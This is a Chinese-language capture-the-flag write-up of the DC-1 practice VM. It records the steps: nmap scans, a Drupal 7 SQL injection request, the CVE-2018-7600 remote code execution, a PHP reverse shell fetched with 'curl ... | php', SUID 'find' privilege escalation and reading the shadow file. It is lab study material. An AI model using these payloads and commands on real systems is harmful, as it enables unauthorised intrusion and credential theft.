DC-1靶机学习

1.日常nmap扫一下

root@kali:~# nmap -sP -PI 192.168.43.0/24 -T4

root@kali:~# nmap -A -p- 192.168.43.61

可以看到是Drupal 7
这个熟悉的界面

在Drupal7是有sql注入漏洞的

2.用burpsuite抓包，改包

POST /node?destination=node HTTP/1.1
Host: 192.168.43.61
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4078.2 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.61/node?destination=node
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.43.61
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

可以看到爆出来的数据
然后转发到sqlmap

由于sqlmap跑不出数据，所以手工吧，害

似乎不是跑不出数据，而是被ban ip了，哦豁，当场去世，恢复快照2333
依旧sqlmap一把梭子

emmm,似乎是drupal 7的特定hash。。。所以还是爆破吧
用hashcat爆破了几个字典，无事发生。。。

3.metasploit

挨个试了下，似乎有个RCE，2333

漏洞出处好像是CVE-2018-7600
这就拿到一个webshell

flag1到手
提示是读取配置文件，于是到网站目录下找找，find命令用不了。。。手动翻吧
翻到一个settings.php,里面是数据库的连接密码，还有个flag2提示，暴力破解不是唯一的方法

好像和之前sql注入拿到的东西（账号密码，只是加密过的）有点相关联，2333，真就没爆破出来。。。

头裂，meterprter输入shell没效果。。。。wdnmd
干脆直接找利用脚本，github找找看
https://github.com/pimps/CVE-2018-7600
这个可以用，但是我要一个交互的shell
本地启用一个端口进行监听8080

nc -lvvp 8080

再将

<?php
$sock=fsockopen("192.168.43.41",8080);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

保存为shell.txt
并在本地用python开一个web服务

 python3 -m http.server --bind 0.0.0.0 8088

执行CVE-2018-7600进行反弹一个·shell

python3 drupa7-CVE-2018-7600.py  -c "curl http://192.168.43.41:8088/shell.txt|php" http://192.168.43.61

查看监听端口

收到了shell
然后破解密码
参考https://www.cnblogs.com/mafeifan/p/4909631.html

php ./scripts/password-hash.sh $S$D46MHlUS6aNeoQ1xqUqI2N5Q3O5tUO8JnpY4D014Lr.xS93qRcqW $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

然而

WTF？？？

4.换个思路

上一步已经拿到了数据库账号密码
或许可以直接修改密码

这就很迷。。。。
算了继续攻坚战，提权试试看
提权指导：https://www.cnblogs.com/zaqzzz/p/12075132.html

find / -user root -perm -4000 -print 2>/dev/null

发现find命令可以提权

基本就是这样，利用root权限看一下shadow
很意外的发现flag4

然后又在root家目录发现flag4.txt

find abcd -exec cat /home/flag4/flag4.txt ;

5.最后的flag

根据find提权，基本情况就是这样，想干啥干啥，
那么砸门来点狠的，哈哈哈哈

find abcd -exec find / -name *flag* ;

就在根目录下

find abcd -exec cat /root/thefinalflag.txt ;

so,通关成功，脸上笑嘻嘻（心里mmp）
最后的话：
后面又拿shadow的密码爆破了下

flag4:orange
这个账户，2333333

真有意思